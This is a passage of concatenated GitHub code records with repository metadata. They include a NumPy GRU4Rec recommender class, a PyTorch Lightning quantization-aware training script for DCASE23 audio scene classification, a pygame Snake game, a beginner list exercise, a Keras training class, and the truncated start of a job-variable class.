pre_embedding_x\n self.pre_embedding_y = pre_embedding_y\n\n self.hidden_act = hidden_act\n self.set_hidden_activation(self.hidden_act)\n self.final_act = final_act\n self.set_final_activation(self.final_act)\n self.loss = loss\n self.grad_cap = grad_cap\n self.layers = layers\n self.rnn_size=rnn_size\n self.n_epochs=n_epochs\n self.learning_rate=learning_rate\n self.checkpoint_dir=checkpoint_dir\n self.n_items = None\n self.itemidmap = None\n\n def linear(self, inp):\n return inp\n\n def tanh(self, inp):\n return np.tanh(inp)\n\n def relu(self, inp):\n inp[inp < 0] = 0\n return inp\n\n def sigmoid(self, inp):\n return 1/(1 + np.exp(-inp))\n\n def softmax(self, inp):\n return np.exp(inp) / sum(np.exp(inp))\n\n class Elu:\n def __init__(self, alpha):\n self.alpha = alpha\n self.elu = lambda Z: np.where(Z > 0, Z, self.alpha * (np.exp(Z) - 1))\n\n def execute(self, inp):\n return self.elu(inp)\n\n def set_hidden_activation(self, hidden_act):\n if self.hidden_act == 'tanh':\n self.hidden_activation = self.tanh\n elif self.hidden_act == 'relu':\n self.hidden_activation = self.relu\n else:\n raise NotImplementedError\n\n def set_final_activation(self, final_act):\n if final_act == 'linear':\n self.final_activation = self.linear\n elif final_act == 'relu':\n self.final_activation = self.relu\n elif final_act == 'tanh':\n self.final_activation = self.tanh\n elif final_act.startswith('elu-'):\n self.final_activation = self.Elu(float(final_act.split('-')[1])).execute\n else:\n raise NotImplementedError\n\n\nclass Gru4recNp(GruBaseNp):\n def __init__(self,is_straining, session_key, item_key, time_key, batch_size, embedding = 0 ,\n hidden_act = 'tanh', final_act='elu-0.5', loss=\"bpr\", grad_cap=0, layers=[100], rnn_size=100, n_epochs=10,\n learning_rate=0.1, checkpoint_dir=\"\",\n adapt=\"adagrad\", pre_embedding_y=0, pre_embedding_x=0):\n super().__init__(is_straining, session_key, item_key, time_key, batch_size, embedding,\n hidden_act, final_act, loss, grad_cap, layers, rnn_size, n_epochs,\n learning_rate, checkpoint_dir,\n adapt, pre_embedding_y, pre_embedding_x)\n\n def process_data(self, data):\n itemids = data[self.item_key].unique()\n self.n_items = len(itemids)\n self.itemidmap = pd.Series(data=np.arange(self.n_items), index=itemids)\n data = pd.merge(data, pd.DataFrame({self.item_key: itemids, 'ItemIdx': self.itemidmap[itemids].values}),\n on=self.item_key, how='inner')\n data.astype({'ItemIdx': 'int32'})\n data.sort_values([self.session_key, self.time_key], inplace=True)\n offset_sessions = np.zeros(data[self.session_key].nunique() + 1, dtype=np.int32)\n offset_sessions[1:] = data.groupby(self.session_key).size().cumsum()\n return data, offset_sessions\n\n def init(self, weights):\n self.Wx = weights[\"Wx\"]\n self.Wh = weights[\"Wh\"]\n self.Wrz = weights[\"Wrz\"]\n self.Bh = weights[\"Bh\"]\n if self.embedding:\n self.E = weights[\"E\"]\n self.Wy=weights[\"Wy\"]\n self.By=weights[\"By\"]\n\n\n def model(self, X, H, M, R=None, Y=None, predict=False):\n if self.embedding:\n Sx = self.E[X]\n y = Sx\n H_new = []\n start = 0\n\n else:\n Sx =self.Wx[0][X]\n vec = Sx + self.Bh[0]\n rz = self.sigmoid(vec[:, self.layers[0]:] + np.matmul(H[0], self.Wrz[0]))\n h = self.hidden_activation(np.matmul(H[0] * rz[:, :self.layers[0]], self.Wh[0]) + vec[:, :self.layers[0]])\n z = rz[:, self.layers[0]:]\n h = (1.0 - z) * H[0] + z * h\n y = h\n start = 1\n H_new = [h]\n\n for i in range(start, len(self.layers)):\n vec = np.matmul(y, self.Wx[i]) + self.Bh[i]\n rz = np.sigmoid(vec[:, self.layers[i]:] + np.matmul(H[i], self.Wrz[i]))\n h = self.hidden_activation(np.matmul(H[i] * rz[:, :self.layers[i]], self.Wh[i]) + vec[:, :self.layers[i]])\n z = rz[:, self.layers[i]:]\n h = (1.0 - z) * H[i] + z * h\n y = h\n H_new.append(h)\n if Y is not None:\n Sy = self.Wy[Y]\n SBy = self.By[Y]\n y = self.final_activation(np.matmul(y, np.transpose(Sy)) + np.squeeze(SBy))\n return H_new, y\n else:\n y = self.final_activation(np.matmul(y, np.transpose(self.Wy)) + np.squeeze(self.By))\n return H_new, y\n\n def predict(self, X, Y, M, H, items):\n if items is not None:\n H_new, yhat= self.model(X, H, M, R=None, Y=Y, predict=True)\n else:\n H_new, yhat = self.model(X, H, M, R=None, Y=None, predict=True)\n return yhat, H_new\n","repo_name":"dawn-farsi/gru4rec-in-tensorflow","sub_path":"services/Gru4recNp.py","file_name":"Gru4recNp.py","file_ext":"py","file_size_in_byte":7122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"74624040574","text":"import pytorch_lightning as pl\nfrom pytorch_lightning.loggers import WandbLogger\nfrom pytorch_lightning.callbacks import LearningRateMonitor\nimport torch\nfrom torch.utils.data import DataLoader\nimport argparse\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport os\nimport pathlib\n\nfrom datasets.dcase23 import get_training_set, get_test_set\nfrom helpers.init import worker_init_fn\nfrom models.cp_mobile_clean import get_model\nfrom models.mel import AugmentMelSTFT\nfrom helpers.lr_schedule import exp_warmup_linear_down\nfrom helpers.utils import mixstyle, QuantizationCallback, QuantParamFreezeCallback\nfrom helpers import nessi\n\n\nclass PLModule(pl.LightningModule):\n def __init__(self, config):\n super().__init__()\n self.config = config # results from argparse and contains all configurations for our experiment\n # model to preprocess waveforms into log mel spectrograms\n self.mel = AugmentMelSTFT(n_mels=config.n_mels,\n sr=config.resample_rate,\n win_length=config.window_size,\n hopsize=config.hop_size,\n n_fft=config.n_fft,\n freqm=config.freqm,\n timem=config.timem,\n fmin=config.fmin,\n fmax=config.fmax,\n fmin_aug_range=config.fmin_aug_range,\n fmax_aug_range=config.fmax_aug_range\n )\n\n # CP-Mobile - our model to be trained on the log mel spectrograms\n self.model = get_model(n_classes=config.n_classes,\n in_channels=config.in_channels,\n base_channels=config.base_channels,\n channels_multiplier=config.channels_multiplier,\n expansion_rate=config.expansion_rate\n )\n\n # int8 model will be initialized later\n self.model_int8 = None\n\n self.kl_div_loss = nn.KLDivLoss(log_target=True, reduction=\"none\") # KL Divergence loss for soft targets\n\n self.device_ids = ['a', 'b', 'c', 's1', 's2', 's3', 's4', 's5', 's6']\n self.label_ids = ['airport', 'bus', 'metro', 'metro_station', 'park', 'public_square', 'shopping_mall',\n 'street_pedestrian', 'street_traffic', 'tram']\n # categorization of devices into 'real', 'seen' and 'unseen'\n self.device_groups = {'a': \"real\", 'b': \"real\", 'c': \"real\",\n 's1': \"seen\", 's2': \"seen\", 's3': \"seen\",\n 's4': \"unseen\", 's5': \"unseen\", 's6': \"unseen\"}\n\n def mel_forward(self, x):\n \"\"\"\n @param x: a batch of raw signals (waveform)\n return: a batch of log mel spectrograms\n \"\"\"\n old_shape = x.size()\n x = x.reshape(-1, old_shape[2]) # for calculating log mel spectrograms we remove the channel dimension\n x = self.mel(x)\n x = x.reshape(old_shape[0], old_shape[1], x.shape[1], x.shape[2]) # batch x channels x mels x time-frames\n return x\n\n def forward(self, x):\n \"\"\"\n :param x: batch of spectrograms\n :return: final model predictions\n \"\"\"\n x = self.model(x)\n return x\n\n def quantized_forward(self, x):\n \"\"\"\n :param x: batch of spectrograms\n :return: final model predictions\n \"\"\"\n # quantized forward needs to be done on cpu\n orig_device = x.device\n x = x.cpu()\n self.model_int8.cpu()\n y = self.model_int8(x)\n return y.to(orig_device)\n\n def configure_optimizers(self):\n \"\"\"\n This is the way pytorch lightening requires optimizers and learning rate schedulers to be defined.\n The specified items are used automatically in the optimization loop (no need to call optimizer.step() yourself).\n :return: dict containing optimizer and learning rate scheduler\n \"\"\"\n optimizer = torch.optim.Adam(self.parameters(), lr=self.config.lr, weight_decay=self.config.weight_decay)\n schedule_lambda = \\\n exp_warmup_linear_down(self.config.warm_up_len, self.config.ramp_down_len, self.config.ramp_down_start,\n self.config.last_lr_value)\n lr_scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, schedule_lambda)\n return {\n 'optimizer': optimizer,\n 'lr_scheduler': lr_scheduler\n }\n\n def training_step(self, train_batch, batch_idx):\n \"\"\"\n :param train_batch: contains one batch from train dataloader\n :param batch_idx\n :return: a dict containing at least loss that is used to update model parameters, can also contain\n other items that can be processed in 'training_epoch_end' to log other metrics than loss\n \"\"\"\n x, file, labels, devices, cities, teacher_logits = train_batch\n x = self.mel_forward(x) # we convert the raw audio signals into log mel spectrograms\n\n if self.config.mixstyle_p > 0:\n # frequency mixstyle\n x = mixstyle(x, self.config.mixstyle_p, self.config.mixstyle_alpha)\n\n y_hat = self.model(x)\n samples_loss = F.cross_entropy(y_hat, labels, reduction=\"none\")\n label_loss = samples_loss.mean()\n\n # Temperature adjusted probabilities of teacher and student\n with torch.cuda.amp.autocast():\n y_hat_soft = F.log_softmax(y_hat / self.config.temperature, dim=-1)\n\n kd_loss = self.kl_div_loss(y_hat_soft, teacher_logits).mean()\n kd_loss = kd_loss * (self.config.temperature ** 2)\n loss = self.config.kd_lambda * label_loss + (1 - self.config.kd_lambda) * kd_loss\n\n results = {\"loss\": loss, \"label_loss\": label_loss * self.config.kd_lambda,\n \"kd_loss\": kd_loss * (1 - self.config.kd_lambda)}\n\n return results\n\n def training_epoch_end(self, outputs):\n \"\"\"\n :param outputs: contains the items you log in 'training_step'\n :return: a dict containing the metrics you want to log to Weights and Biases\n \"\"\"\n avg_loss = torch.stack([x['loss'] for x in outputs]).mean()\n avg_label_loss = torch.stack([x['label_loss'] for x in outputs]).mean()\n avg_kd_loss = torch.stack([x['kd_loss'] for x in outputs]).mean()\n self.log_dict({'loss': avg_loss, 'label_loss': avg_label_loss, 'kd_loss': avg_kd_loss})\n\n def validation_step(self, val_batch, batch_idx):\n x, files, labels, devices, cities = val_batch\n x = self.mel_forward(x)\n\n # fp32 accuracy + loss\n y_hat = self.forward(x)\n samples_loss = F.cross_entropy(y_hat, labels, reduction=\"none\")\n fp32_loss = samples_loss.mean()\n _, preds = torch.max(y_hat, dim=1)\n n_correct_pred_per_sample = (preds == labels)\n fp32_n_correct_pred = n_correct_pred_per_sample.sum()\n\n # quantized metrics\n y_hat = self.quantized_forward(x)\n samples_loss = F.cross_entropy(y_hat, labels, reduction=\"none\")\n loss = samples_loss.mean()\n\n # for computing accuracy\n _, preds = torch.max(y_hat, dim=1)\n n_correct_pred_per_sample = (preds == labels)\n n_correct_pred = n_correct_pred_per_sample.sum()\n\n dev_names = [d.rsplit(\"-\", 1)[1][:-4] for d in files]\n results = {'val_loss': loss, \"n_correct_pred\": n_correct_pred, \"n_pred\": len(labels),\n \"fp32_val_loss\": fp32_loss, \"fp32_n_correct_pred\": fp32_n_correct_pred}\n\n # log metric per device and scene\n for d in self.device_ids:\n results[\"devloss.\" + d] = torch.as_tensor(0., device=self.device)\n results[\"devcnt.\" + d] = torch.as_tensor(0., device=self.device)\n results[\"devn_correct.\" + d] = torch.as_tensor(0., device=self.device)\n for i, d in enumerate(dev_names):\n results[\"devloss.\" + d] = results[\"devloss.\" + d] + samples_loss[i]\n results[\"devn_correct.\" + d] = results[\"devn_correct.\" + d] + n_correct_pred_per_sample[i]\n results[\"devcnt.\" + d] = results[\"devcnt.\" + d] + 1\n\n for l in self.label_ids:\n results[\"lblloss.\" + l] = torch.as_tensor(0., device=self.device)\n results[\"lblcnt.\" + l] = torch.as_tensor(0., device=self.device)\n results[\"lbln_correct.\" + l] = torch.as_tensor(0., device=self.device)\n for i, l in enumerate(labels):\n results[\"lblloss.\" + self.label_ids[l]] = results[\"lblloss.\" + self.label_ids[l]] + samples_loss[i]\n results[\"lbln_correct.\" + self.label_ids[l]] = \\\n results[\"lbln_correct.\" + self.label_ids[l]] + n_correct_pred_per_sample[i]\n results[\"lblcnt.\" + self.label_ids[l]] = results[\"lblcnt.\" + self.label_ids[l]] + 1\n return results\n\n def validation_epoch_end(self, outputs):\n avg_loss = torch.stack([x['val_loss'] for x in outputs]).mean()\n val_acc = sum([x['n_correct_pred'] for x in outputs]) * 1.0 / sum(x['n_pred'] for x in outputs)\n\n fp32_avg_loss = torch.stack([x['fp32_val_loss'] for x in outputs]).mean()\n fp32_val_acc = sum([x['fp32_n_correct_pred'] for x in outputs]) * 1.0 / sum(x['n_pred'] for x in outputs)\n\n logs = {'val_acc': val_acc, 'val_loss': avg_loss, 'fp32_val.loss': fp32_avg_loss, 'fp32_val_acc': fp32_val_acc}\n\n # log metric per device and scene\n for d in self.device_ids:\n dev_loss = torch.stack([x[\"devloss.\" + d] for x in outputs]).sum()\n dev_cnt = torch.stack([x[\"devcnt.\" + d] for x in outputs]).sum()\n dev_corrct = torch.stack([x[\"devn_correct.\" + d] for x in outputs]).sum()\n logs[\"vloss.\" + d] = dev_loss / dev_cnt\n logs[\"vacc.\" + d] = dev_corrct / dev_cnt\n logs[\"vcnt.\" + d] = dev_cnt\n # device groups\n logs[\"acc.\" + self.device_groups[d]] = logs.get(\"acc.\" + self.device_groups[d], 0.) + dev_corrct\n logs[\"count.\" + self.device_groups[d]] = logs.get(\"count.\" + self.device_groups[d], 0.) + dev_cnt\n logs[\"lloss.\" + self.device_groups[d]] = logs.get(\"lloss.\" + self.device_groups[d], 0.) + dev_loss\n\n for d in set(self.device_groups.values()):\n logs[\"acc.\" + d] = logs[\"acc.\" + d] / logs[\"count.\" + d]\n logs[\"lloss.\" + d] = logs[\"lloss.\" + d] / logs[\"count.\" + d]\n\n for l in self.label_ids:\n lbl_loss = torch.stack([x[\"lblloss.\" + l] for x in outputs]).sum()\n lbl_cnt = torch.stack([x[\"lblcnt.\" + l] for x in outputs]).sum()\n lbl_corrct = torch.stack([x[\"lbln_correct.\" + l] for x in outputs]).sum()\n logs[\"vloss.\" + l] = lbl_loss / lbl_cnt\n logs[\"vacc.\" + l] = lbl_corrct / lbl_cnt\n logs[\"vcnt.\" + l] = lbl_cnt\n\n logs[\"macro_avg_acc\"] = torch.mean(torch.stack([logs[\"vacc.\" + l] for l in self.label_ids]))\n self.log_dict(logs)\n\n\ndef fuse_model(module):\n # fuse layers\n module.model.eval() # only works in eval mode\n module.model.cpu()\n module.model.fuse_model()\n\n # put original net back on cuda\n module.model.cuda()\n\n\ndef prepare_quantized(module):\n module.model.train() # only works in train mode\n module.model.cpu()\n\n # give information of what kind of observers to attach\n module.model.qconfig = torch.ao.quantization.get_default_qat_qconfig('fbgemm')\n\n # prepare model for QAT, insert observers and fake_quants\n module.model = torch.ao.quantization.prepare_qat(module.model)\n\n # attach the quantized model to module\n module.model_int8 = torch.ao.quantization.convert(module.model)\n\n # put original net back on cuda and in train mode\n module.model.cuda()\n module.model.train()\n\n\ndef load_pretrained_from_id(module, project_name, wandb_id):\n ckpt_path = os.path.join(project_name, wandb_id, \"checkpoints\")\n assert os.path.exists(ckpt_path), f\"No checkpoint path '{ckpt_path}' found.\"\n ckpt_files = [file for file in pathlib.Path(os.path.expanduser(ckpt_path)).rglob('*.ckpt')]\n assert len(ckpt_files) > 0, f\"No checkpoint files found in path {ckpt_path}.\"\n latest_ckpt = sorted(ckpt_files)[-1]\n state_dict = torch.load(latest_ckpt)['state_dict']\n # remove \"model\" prefix\n state_dict = {k[len(\"model.\"):]: state_dict[k] for k in state_dict.keys()}\n module.model.load_state_dict(state_dict)\n\n\ndef train(config):\n # logging is done using wandb\n wandb_logger = WandbLogger(\n project=config.project_name,\n notes=\"CPJKU pipeline for DCASE23 Task 1.\",\n tags=[\"DCASE23\"],\n config=config, # this logs all hyperparameters for us\n name=config.experiment_name\n )\n\n # train dataloader\n train_dl = DataLoader(dataset=get_training_set(config.cache_path, config.resample_rate, config.roll,\n config.dir_prob, config.temperature),\n worker_init_fn=worker_init_fn,\n num_workers=config.num_workers,\n batch_size=config.batch_size,\n shuffle=True)\n\n # test loader\n test_dl = DataLoader(dataset=get_test_set(config.cache_path, config.resample_rate),\n worker_init_fn=worker_init_fn,\n num_workers=config.num_workers,\n batch_size=config.batch_size)\n\n # create pytorch lightening module\n pl_module = PLModule(config)\n\n # load model to fine-tune via QAT\n if config.wandb_id:\n load_pretrained_from_id(pl_module, config.project_name, config.wandb_id)\n\n # fuse layers and prepare for QAT\n fuse_model(pl_module)\n prepare_quantized(pl_module)\n\n # get model complexity from nessi and log results to wandb\n sample = next(iter(train_dl))[0][0].unsqueeze(0)\n shape = pl_module.mel_forward(sample).size()\n macs, params = nessi.get_model_size(pl_module.model, input_size=shape)\n wandb_logger.experiment.config['MACs'] = macs\n wandb_logger.experiment.config['Parameters'] = params\n\n # create monitor to keep track of learning rate - we want to check the behaviour of our learning rate schedule\n lr_monitor = LearningRateMonitor(logging_interval='epoch')\n # create the pytorch lightening trainer by specifying the number of epochs to train, the logger,\n # on which kind of device(s) to train and possible callbacks\n trainer = pl.Trainer(max_epochs=config.n_epochs,\n logger=wandb_logger,\n accelerator='auto',\n devices=1,\n callbacks=[lr_monitor,\n QuantizationCallback(),\n QuantParamFreezeCallback(config.freeze_params_epochs)])\n # start training and validation for the specified number of epochs\n trainer.fit(pl_module, train_dl, test_dl)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Example of parser. ')\n\n # general\n parser.add_argument('--project_name', type=str, default=\"DCASE23_Task1\")\n parser.add_argument('--wandb_id', type=str, default=None) # for loading a pre-trained model\n parser.add_argument('--experiment_name', type=str, default=\"CPJKU_QAT\")\n parser.add_argument('--num_workers', type=int, default=12) # number of workers for dataloaders\n\n # dataset\n # location to store resampled waveform\n parser.add_argument('--cache_path', type=str, default=os.path.join(\"datasets\", \"cpath\"))\n\n # model\n parser.add_argument('--n_classes', type=int, default=10) # classification model with 'n_classes' output neurons\n parser.add_argument('--in_channels', type=int, default=1)\n # adapt the complexity of the neural network (3 main dimensions to scale CP-Mobile)\n parser.add_argument('--base_channels', type=int, default=32)\n parser.add_argument('--channels_multiplier', type=int, default=2.3)\n parser.add_argument('--expansion_rate', type=int, default=3)\n\n # training\n parser.add_argument('--n_epochs', type=int, default=20)\n parser.add_argument('--batch_size', type=int, default=256)\n parser.add_argument('--mixstyle_p', type=float, default=0.4) # frequency mixstyle\n parser.add_argument('--mixstyle_alpha', type=float, default=0.3)\n parser.add_argument('--weight_decay', type=float, default=0.0001)\n parser.add_argument('--roll', type=int, default=4000) # roll waveform over time\n parser.add_argument('--dir_prob', type=float, default=0.6) # prob. to apply device impulse response augmentation\n ## knowledge distillation\n parser.add_argument('--temperature', type=float, default=2.0)\n parser.add_argument('--kd_lambda', type=float, default=0.02)\n\n # learning rate + schedule\n # phases:\n # 1. exponentially increasing warmup phase (for 'warm_up_len' epochs)\n # 2. constant lr phase using value specified in 'lr' (for 'ramp_down_start' - 'warm_up_len' epochs)\n # 3. linearly decreasing to value 'las_lr_value' * 'lr' (for 'ramp_down_len' epochs)\n # 4. finetuning phase using a learning rate of 'last_lr_value' * 'lr' (for the rest of epochs up to 'n_epochs')\n parser.add_argument('--lr', type=float, default=5e-5)\n parser.add_argument('--warm_up_len', type=int, default=0)\n parser.add_argument('--ramp_down_start', type=int, default=1)\n parser.add_argument('--ramp_down_len', type=int, default=16)\n parser.add_argument('--last_lr_value', type=float, default=0.1) # relative to 'lr'\n\n # preprocessing\n parser.add_argument('--resample_rate', type=int, default=32000)\n parser.add_argument('--window_size', type=int, default=3072) # in samples (corresponds to 96 ms)\n parser.add_argument('--hop_size', type=int, default=500) # in samples (corresponds to ~16 ms)\n parser.add_argument('--n_fft', type=int, default=4096) # length (points) of fft, e.g. 4096 point FFT\n parser.add_argument('--n_mels', type=int, default=256) # number of mel bins\n parser.add_argument('--freqm', type=int, default=48) # mask up to 'freqm' spectrogram bins\n parser.add_argument('--timem', type=int, default=0) # mask up to 'timem' spectrogram frames\n parser.add_argument('--fmin', type=int, default=0) # mel bins are created for freqs. between 'fmin' and 'fmax'\n parser.add_argument('--fmax', type=int, default=None)\n parser.add_argument('--fmin_aug_range', type=int, default=1) # data augmentation: vary 'fmin' and 'fmax'\n parser.add_argument('--fmax_aug_range', type=int, default=1000)\n\n # qat specific\n # freeze quantizer parameters and batchnorm stats for last n epochs\n parser.add_argument('--freeze_params_epochs', type=int, default=4)\n\n args = parser.parse_args()\n train(args)\n","repo_name":"fschmid56/cpjku_dcase23","sub_path":"run_qat.py","file_name":"run_qat.py","file_ext":"py","file_size_in_byte":18881,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"79"} +{"seq_id":"18483449458","text":"import pygame\r\nimport random\r\n\r\n# Initialization of Components and Colors\r\npygame.init()\r\npygame.font.init()\r\ncolorBlack = (0, 0, 0)\r\ncolorWhite = (255, 255, 255)\r\ncolorRed = (255, 0, 0)\r\ndisplayWidth = 640\r\ndisplayHeight = 480\r\ngameDisplay = pygame.display.set_mode((displayWidth, displayHeight))\r\npygame.display.set_caption(\"PyGame SNAKE\")\r\nhighScoreFile = open(\"HighScore.txt\", \"r\") # Opening The File Containing High Score in Read Mode\r\nclock = pygame.time.Clock()\r\n\r\n# Game Variables\r\ngameOver = False\r\nendGame = False\r\nyMovement = True\r\nxMovement = True\r\nbodyLength = 1\r\nplayerScore = 0\r\nhighScore = int(highScoreFile.read()) # Reading The High Score\r\nxVelocity = 0\r\nyVelocity = 0\r\nxPosition = round(displayWidth/2)\r\nyPosition = round(displayHeight/2)\r\nxFood = random.randint(35, displayWidth-35)\r\nyFood = random.randint(25, displayHeight-25)\r\nbodyList = []\r\n\r\ndef gameReset() :\r\n global gameOver, endGame, yMovement, xMovement, bodyLength, playerScore, xVelocity, yVelocity, xPosition, yPosition, xFood, yFood, bodyList\r\n gameOver = False\r\n endGame = False\r\n yMovement = True\r\n xMovement = True\r\n bodyLength = 1\r\n playerScore = 0\r\n xVelocity = 0\r\n yVelocity = 0\r\n xPosition = round(displayWidth/2)\r\n yPosition = round(displayHeight/2)\r\n xFood = random.randint(35, displayWidth-35)\r\n yFood = random.randint(25, displayHeight-25)\r\n bodyList = []\r\n\r\n# Game Loop\r\nwhile not endGame :\r\n\r\n # Checking Pressed Key\r\n for keyPress in pygame.event.get() :\r\n if keyPress.type == pygame.KEYDOWN :\r\n if keyPress.key == pygame.K_RIGHT and yMovement :\r\n xVelocity = 5\r\n yVelocity = 0 \r\n yMovement = False\r\n xMovement = True\r\n if keyPress.key == pygame.K_LEFT and yMovement:\r\n xVelocity = -5\r\n yVelocity = 0\r\n yMovement = False\r\n xMovement = True\r\n if keyPress.key == pygame.K_UP and xMovement:\r\n xVelocity = 0\r\n yVelocity = -5\r\n yMovement = True\r\n xMovement = False\r\n if keyPress.key == pygame.K_DOWN and xMovement:\r\n xVelocity = 0\r\n yVelocity = 5 \r\n yMovement = True\r\n xMovement = False\r\n if keyPress.key == pygame.K_SPACE and gameOver:\r\n gameReset()\r\n if keyPress.key == pygame.K_ESCAPE and gameOver:\r\n endGame = True\r\n\r\n if keyPress.type == pygame.QUIT :\r\n endGame = True\r\n \r\n xPosition = xPosition + xVelocity\r\n yPosition = yPosition + yVelocity\r\n\r\n # Score Counter and Random Food Spawner\r\n if abs(xPosition - xFood) < 7 and abs(yPosition - yFood) < 7 and not gameOver :\r\n playerScore = playerScore + 1\r\n xFood = random.randint(35, displayWidth-35)\r\n yFood = random.randint(25, displayHeight-25)\r\n bodyLength = bodyLength + 1\r\n \r\n # Colision Checking 1 (Wall Colision Checking)\r\n if xPosition < 1 or xPosition > 639 or yPosition < 1 or yPosition > 479 :\r\n gameOver = True\r\n \r\n gameDisplay.fill(colorWhite)\r\n font = pygame.font.SysFont(None, 40)\r\n\r\n # Displaying Score and Game Over Message\r\n if not gameOver :\r\n text = font.render(\"{}\".format(playerScore), True, (0, 0, 0))\r\n gameDisplay.blit(text, (320, 5))\r\n pygame.draw.rect(gameDisplay, colorRed, [xFood, yFood, 15, 15])\r\n else :\r\n # High Score Checking and Modifying\r\n if playerScore > highScore :\r\n highScoreFile.close()\r\n highScoreFile = open(\"HighScore.txt\", \"w\") # Opening The File Containing High Score in Read Mode\r\n highScore = playerScore\r\n highScoreFile.write(str(highScore)) # Writing The High Score\r\n\r\n text = font.render(\"Game Over! Your Score : {}\".format(playerScore), True, (0, 0, 0))\r\n textRectangle = text.get_rect(center=(displayWidth/2, displayHeight/2 - 30))\r\n gameDisplay.blit(text, textRectangle)\r\n text = font.render(\"High Score : {}\".format(highScore), True, (0, 0, 0))\r\n textRectangle = text.get_rect(center=(displayWidth/2, displayHeight/2))\r\n gameDisplay.blit(text, textRectangle)\r\n text = font.render(\"Press Space To Restart (OR) Esc To End\", True, (0, 0, 0))\r\n textRectangle = text.get_rect(center=(displayWidth/2, displayHeight/2 + 30))\r\n gameDisplay.blit(text, textRectangle)\r\n xVelocity = yVelocity = 0\r\n\r\n # Snake Head Position Checking and Length Increasing\r\n headList = []\r\n headList.append(xPosition)\r\n headList.append(yPosition)\r\n bodyList.append(headList)\r\n\r\n # Colision Checking 2 (Self Colision Checking)\r\n for x in bodyList[:len(bodyList)-1] :\r\n if x == headList and (not xMovement or not yMovement):\r\n gameOver = True\r\n\r\n # Drawing Snake and Maintaining Length\r\n if len(bodyList) > bodyLength :\r\n del bodyList[0]\r\n for x, y in bodyList :\r\n pygame.draw.rect(gameDisplay, colorBlack, [x, y, 15, 15])\r\n\r\n pygame.display.update()\r\n clock.tick(24)\r\n\r\nhighScoreFile.close()\r\npygame.quit()\r\nquit()\r\n\r\n## Created by Joydeep Biswas ##\r\n","repo_name":"joydeep-biswas/SNAKE_using_PyGame","sub_path":"SNAKE.py","file_name":"SNAKE.py","file_ext":"py","file_size_in_byte":5230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"413603186","text":"#list of my favourite foods\nmy_foods = ['pizza','falafel','carrot cake']\n\n#copy my list of favourite foods for my friend\nfriend_foods = my_foods[:]\n\n#add a new favourite food to my list\nmy_foods.append('cannoli')\n\n#add a new favourite food to my friend's list\nfriend_foods.append('ice cream')\n\n#print both lists - using for loop\nprint('My favourite foods are:')\nfor food in my_foods:\n print(food)\n\nprint(\"\\nMy friend's favourite foods are:\")\nfor food in friend_foods:\n print(food)\n","repo_name":"jac1155mtl/Python","sub_path":"Learning/Python Crash Course/_4_12_more_loops.py","file_name":"_4_12_more_loops.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33349158800","text":"from base.base_trainer import BaseTrain\nimport os\nfrom keras.callbacks import ModelCheckpoint, TensorBoard, EarlyStopping, LearningRateScheduler\nfrom trainers.learning_rate_scd import step_decay_wrapper\n\n\n\nclass SoftMaxModelTrainer(BaseTrain):\n def __init__(self, model, train_generator, valid_generator, config):\n super(SoftMaxModelTrainer, self).__init__(model, train_generator, config)\n self.valid_generator = valid_generator\n self.callbacks = []\n self.loss = []\n self.acc = []\n self.val_loss = []\n self.val_acc = []\n self.step_decay_function = step_decay_wrapper(self.config)\n self.init_callbacks()\n\n\n def init_callbacks(self):\n if self.config.callbacks.is_save_model:\n self.callbacks.append(\n ModelCheckpoint(\n filepath=os.path.join(self.config.callbacks.checkpoint_dir, '%s-{epoch:02d}-{val_loss:.2f}.hdf5' % self.config.exp.name),\n monitor=self.config.callbacks.checkpoint_monitor,\n mode=self.config.callbacks.checkpoint_mode,\n save_best_only=self.config.callbacks.checkpoint_save_best_only,\n save_weights_only=self.config.callbacks.checkpoint_save_weights_only,\n verbose=self.config.callbacks.checkpoint_verbose,\n )\n )\n\n self.callbacks.append(\n TensorBoard(\n log_dir=self.config.callbacks.tensorboard_log_dir,\n write_graph=self.config.callbacks.tensorboard_write_graph,\n )\n )\n\n self.callbacks.append(\n EarlyStopping(\n monitor='val_loss', min_delta=0, patience=3, verbose=1, mode='auto')\n )\n\n self.callbacks.append(\n LearningRateScheduler(self.step_decay_function)\n )\n\n #if hasattr(self.config,\"comet_api_key\"):\n # from comet_ml import Experiment\n # experiment = Experiment(api_key=self.config.comet_api_key, project_name=self.config.exp_name)\n # experiment.disable_mp()\n # experiment.log_multiple_params(self.config)\n # self.callbacks.append(experiment.get_keras_callback())\n\n def train(self):\n history = self.model.fit_generator(\n self.generator,\n epochs=self.config.trainer.num_epochs,\n steps_per_epoch=len(self.generator),\n validation_data=self.valid_generator,\n validation_steps=len(self.valid_generator),\n callbacks=self.callbacks,\n verbose=1)\n\n self.loss.extend(history.history['loss'])\n self.acc.extend(history.history['acc'])\n self.val_loss.extend(history.history['val_loss'])\n self.val_acc.extend(history.history['val_acc'])\n","repo_name":"aviresler/antique-gen","sub_path":"trainers/softmax_trainer.py","file_name":"softmax_trainer.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"71187830014","text":"import os\nimport copy\nimport re\n\nclass Jobvar(object):\n\tdef __init__(self, manager, task_id, sub_id, jobvar, max_cycle):\n\t\tself.__manager = manager\n\t\tself.__ext_mgr=self.__manager.load_ext_manager()\n\t\tself.__task = self.__manager.load_task(task_id)\n\t\tself.__sub_id = sub_id\n\t\tself.__jobvar = jobvar\n\t\tself.__max_cycle = max_cycle\n\n\t\tself.__initialize_manager()\n\t\n\tdef __initialize_manager(self):\n\t\tself.__config_mgr\t= self.__manager.load_config_manager()\n\n\t\tself.__backend_mgr = self.__manager.load_backend_manager()\n\t\tself.__bootstrap_mgr = self.__manager.load_bootstrap_manager()\n\t\tself.__navigator_mgr = self.__manager.load_navigator_manager()\n\t\tself.__context_mgr = self.__manager.load_context_manager()\n\t\tself.__action_mgr\t= self.__manager.load_action_manager()\n\t\tself.__launcher_mgr = self.__manager.load_launcher_manager()\n\n\n\n\tdef 